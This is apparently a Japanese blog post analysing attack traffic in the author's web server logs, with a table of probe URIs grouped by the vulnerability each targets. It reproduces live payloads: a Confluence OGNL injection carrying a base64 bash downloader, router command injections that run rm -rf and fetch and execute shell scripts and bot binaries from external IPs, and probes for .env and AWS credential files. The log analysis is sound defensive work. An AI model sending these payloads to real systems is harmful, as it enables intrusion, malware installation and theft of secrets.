公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
Atlassian Confluence の脆弱性(CVE-2022-26134)を利用してスクリプトを実行しようとしていると思われるリクエスト
Confluence ゼロデイ(CVE-2022-26134)に対する Akamai の所見
/$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27echo%20dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw%2BIi9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA%2BJjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM%2BJi0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/
GeoServerの脆弱性
GeoServer の深刻な脆弱性 CVE-2023-35042 が FIX:RCE 攻撃が観測されている – IoT OT Security News
/geoserver/web/
Cisco 製 Cisco IOS XE などのネットワーク機器の Web UI の脆弱性
下記の記事のようなネットワーク機器のWeb UIにアクセスを試みる通信だと思われます。
Cisco 製 Cisco IOS XE の Web UI の脆弱性について(CVE-2023-20198 等) | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
/webui/
Spring Frameworkの脆弱性
Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
/actuator/gateway/routes
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
laravelの脆弱性を利用した攻撃
詳しくはわからないのですが、laravelの脆弱性をつく際に送られる通信みたいです。
laravelのヤバい脆弱性をついたkinsing(kdevtmpfsi)というマルウェアに感染した話 CVE-2021-3129 #PHP - Qiita
/_ignition/execute-solution
Netlink GPONルータ 脆弱性
ルータの脆弱性「CVE-2020-10173」を利用するIoTマルウェア | トレンドマイクロ セキュリティブログ
/boaform/admin/formLogin
jQueryの脆弱性
脆弱性があるバージョンを利用しているか確認する通信
//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js
//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js
WordPress関連の攻撃
xmlrpc.phpへのリクエスト
WordPressのxmlrpc.phpというファイルが最近Dos攻撃の標的にされているようなので、Dos攻撃できるかの調査の通信になると思います。
【WordPress】「xmlrpc.php」への攻撃とは | Security Press(セキュリティプレス)
/xmlrpc.php
wlwmanifest.xmlの調査
Windows Live Writerというツールの設定ファイルがあるかの調査
/wp1/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/shop/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
不審な通信の一覧
| uri | count |
|---|---|
| /robots.txt | 1491 |
| / | 739 |
| /.env | 700 |
| /sw.js | 363 |
| /favicon.ico | 333 |
| /$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27echo%20dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw%2BIi9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA%2BJjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM%2BJi0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/ | 263 |
| /wp-login.php | 220 |
| /ads.txt | 198 |
| /xmlrpc.php | 176 |
| /.git/config | 153 |
| * | 139 |
| mstshash=Administr | 97 |
| //.env | 84 |
| /app-ads.txt | 77 |
| /index.xml | 70 |
| /webui/ | 56 |
| /geoserver/web/ | 56 |
| //pagead2.googlesyndication.com/pagead/js/adsbygoogle.js | 54 |
| /style.php | 50 |
| /manifest.js | 50 |
| /actuator/gateway/routes | 47 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 42 |
| /_ignition/execute-solution | 39 |
| /.well-known/security.txt | 36 |
| /core/.env | 31 |
| /boaform/admin/formLogin | 31 |
| /sellers.json | 30 |
| /inputs.php | 28 |
| /api/.env | 28 |
| /manager/html | 26 |
| /.DS_Store | 25 |
| /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) | 24 |
| 12.1.2 | 23 |
| /local/.env | 23 |
| /HNAP1/ | 23 |
| /.well-known/traffic-advice | 23 |
| //stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js | 22 |
| //ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js | 22 |
| /app/.env | 21 |
| /actuator/health | 20 |
| //cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js | 20 |
| /.vscode/sftp.json | 20 |
| /laravel/.env | 18 |
| /simple.php | 17 |
| /login | 17 |
| /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) | 16 |
| /about | 16 |
| /xmlrpc.php?rsd | 15 |
| /wp1/wp-includes/wlwmanifest.xml | 15 |
| /wp/wp-includes/wlwmanifest.xml | 15 |
| /wordpress/wp-includes/wlwmanifest.xml | 15 |
| /web/wp-includes/wlwmanifest.xml | 15 |
| /test/wp-includes/wlwmanifest.xml | 15 |
| /site/wp-includes/wlwmanifest.xml | 15 |
| /shop/wp-includes/wlwmanifest.xml | 15 |
| /crm/.env | 15 |
| /cms/wp-includes/wlwmanifest.xml | 15 |
| /blog/wp-includes/wlwmanifest.xml | 15 |
| /apps/.env | 15 |
| /2019/wp-includes/wlwmanifest.xml | 15 |
| [\x22miner1\x22, | 14 |
| /wp2/wp-includes/wlwmanifest.xml | 14 |
| /wp-includes/wlwmanifest.xml | 14 |
| /website/wp-includes/wlwmanifest.xml | 14 |
| /sito/wp-includes/wlwmanifest.xml | 14 |
| /pages/createpage-entervariables.action | 14 |
| /news/wp-includes/wlwmanifest.xml | 14 |
| /cf_scripts/scripts/ajax/ckeditor/ckeditor.js | 14 |
| /aab9 | 14 |
| /_profiler/phpinfo | 14 |
| /.aws/credentials | 14 |
| /public/.env | 13 |
| /autodiscover/autodiscover.json?@zdi/Powershell | 13 |
| /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}mips;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep; | 12 |
| /application/.env | 12 |
| /admin/index.html | 12 |
| /admin/config.php | 12 |
| /aab8 | 12 |
| /HNAP1 | 12 |
| /.well-known/assetlinks.json | 12 |
| /.well-known/apple-app-site-association | 12 |
| /+CSCOE+/logon.html | 12 |
| \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 | 11 |
| 7 | 11 |
| /www/.env | 11 |
| /wp-content/.env | 11 |
| /wp-admin/.env | 11 |
| /src/.env | 11 |
| /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ | 11 |
| /sites/all/libraries/mailchimp/.env | 11 |
| /protected/.env | 11 |
| /phpinfo.php | 11 |
| /old/.env | 11 |
| /new/.env | 11 |
| /logon.htm | 11 |
| /library/.env | 11 |
| /info.php | 11 |
| /index.php | 11 |
| /druid/index.html | 11 |
| /dologin.action | 11 |
| /database/.env | 11 |
| /conf/.env | 11 |
| /cgi-bin/.env | 11 |
| /base/.env | 11 |
| /audio/.env | 11 |
| /app/config/.env | 11 |
| /admin/.env | 11 |
| /.env.save | 11 |
| /.env.production | 11 |
| /.env.prod | 11 |
| /webfig/ | 10 |
| /setup/setupadministrator-start.action | 10 |
| /sdk | 10 |
| /manage/account/login | 10 |
| /login.jsp | 10 |
| /jquery-3.3.1.min.js | 10 |
| /is-bin | 10 |
| /index.jsp | 10 |
| /fw6I | 10 |
| /docker/.env | 10 |
| /dns-query | 10 |
| /contact | 10 |
| /cgi-bin/login.cgi | 10 |
| /cgi-bin/authLogin.cgi | 10 |
| /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab | 10 |
| /admin.php | 10 |
| /aaa9 | 10 |
| /Visu/ens/events | 10 |
| /.env.old | 10 |
| /hudson | 9 |
| /config.json | 9 |
| /chosen.php | 9 |
| /backend/.env | 9 |
| /ReportServer | 9 |
| /.git/HEAD | 9 |
| \x00\x00BBBB\xBA\x8C\xC1\xABDAAA | 8 |
| /wp-includes/style.php?p=J938PnuGv1QZCrNF6%2B2Zh81Kh1LkbWI20JU3La%2BrEPOWZKToeebeUDXrR8BZYXfYBqmUfOUyJ552h6ifeNsJyXHd0YcuVhbPMxL60L9ESMa9ilqIQCueFw8wkWMxVW84IWGa1%2BkY%2B%2BCIiAUj94zv3vDVD4G0f2uLjqRIhyYDivt0GQp3sn9oLSDcvS0CHmj%2Bf2ojDUTvDO%2F7NlaVVF6H2NQZjaVtY9xSqOw3aQ3KophzBMqlTYJzTvY7nexxzcsoW%2FPknW%2Bh8E7jL7MZJUjMMS6FKA10b7h5xm4dUvXNoQYAxb%2FUtnK4HcSBUthms2ZKUks1hPjaQiCtmXM9yMAgWg%3D%3D | 8 |
| /wp-includes/SimplePie/plugins.php | 8 |
| /wp-content/uploads/style.php?p=J938PnuGv1QZCrNF6%2B2Zh81Kh1LkbWI20JU3La%2BrEPOWZKToeebeUDXrR8BZYXfYBqmUfOUyJ552h6ifeNsJyXHd0YcuVhbPMxL60L9ESMa9ilqIQCueFw8wkWMxVW84IWGa1%2BkY%2B%2BCIiAUj94zv3vDVD4G0f2uLjqRIhyYDivt0GQp3sn9oLSDcvS0CHmj%2Bf2ojDUTvDO%2F7NlaVVF6H2NQZjaVtY9xSqOw3aQ3KophzBMqlTYJzTvY7nexxzcsoW%2FPknW%2Bh8E7jL7MZJUjMMS6FKA10b7h5xm4dUvXNoQYAxb%2FUtnK4HcSBUthms2ZKUks1hPjaQiCtmXM9yMAgWg%3D%3D | 8 |
| /wp-content/themes/bricks/style.css | 8 |
| /wp-content/style.php?p=J938PnuGv1QZCrNF6%2B2Zh81Kh1LkbWI20JU3La%2BrEPOWZKToeebeUDXrR8BZYXfYBqmUfOUyJ552h6ifeNsJyXHd0YcuVhbPMxL60L9ESMa9ilqIQCueFw8wkWMxVW84IWGa1%2BkY%2B%2BCIiAUj94zv3vDVD4G0f2uLjqRIhyYDivt0GQp3sn9oLSDcvS0CHmj%2Bf2ojDUTvDO%2F7NlaVVF6H2NQZjaVtY9xSqOw3aQ3KophzBMqlTYJzTvY7nexxzcsoW%2FPknW%2Bh8E7jL7MZJUjMMS6FKA10b7h5xm4dUvXNoQYAxb%2FUtnK4HcSBUthms2ZKUks1hPjaQiCtmXM9yMAgWg%3D%3D | 8 |
| /wp-content/plugins/core-plugin/include.php | 8 |
| /wp-admin/style.php?p=J938PnuGv1QZCrNF6%2B2Zh81Kh1LkbWI20JU3La%2BrEPOWZKToeebeUDXrR8BZYXfYBqmUfOUyJ552h6ifeNsJyXHd0YcuVhbPMxL60L9ESMa9ilqIQCueFw8wkWMxVW84IWGa1%2BkY%2B%2BCIiAUj94zv3vDVD4G0f2uLjqRIhyYDivt0GQp3sn9oLSDcvS0CHmj%2Bf2ojDUTvDO%2F7NlaVVF6H2NQZjaVtY9xSqOw3aQ3KophzBMqlTYJzTvY7nexxzcsoW%2FPknW%2Bh8E7jL7MZJUjMMS6FKA10b7h5xm4dUvXNoQYAxb%2FUtnK4HcSBUthms2ZKUks1hPjaQiCtmXM9yMAgWg%3D%3D | 8 |
| /wp | 8 |
| /wordpress | 8 |
| /version | 8 |
| /system/.env | 8 |
| /style.php?p=J938PnuGv1QZCrNF6%2B2Zh81Kh1LkbWI20JU3La%2BrEPOWZKToeebeUDXrR8BZYXfYBqmUfOUyJ552h6ifeNsJyXHd0YcuVhbPMxL60L9ESMa9ilqIQCueFw8wkWMxVW84IWGa1%2BkY%2B%2BCIiAUj94zv3vDVD4G0f2uLjqRIhyYDivt0GQp3sn9oLSDcvS0CHmj%2Bf2ojDUTvDO%2F7NlaVVF6H2NQZjaVtY9xSqOw3aQ3KophzBMqlTYJzTvY7nexxzcsoW%2FPknW%2Bh8E7jL7MZJUjMMS6FKA10b7h5xm4dUvXNoQYAxb%2FUtnK4HcSBUthms2ZKUks1hPjaQiCtmXM9yMAgWg%3D%3D | 8 |
| /sources/.env | 8 |
| /sitemap.txt | 8 |
| /script/.env | 8 |
| /rest/tinymce/1/macro/preview | 8 |
| /rest/.env | 8 |
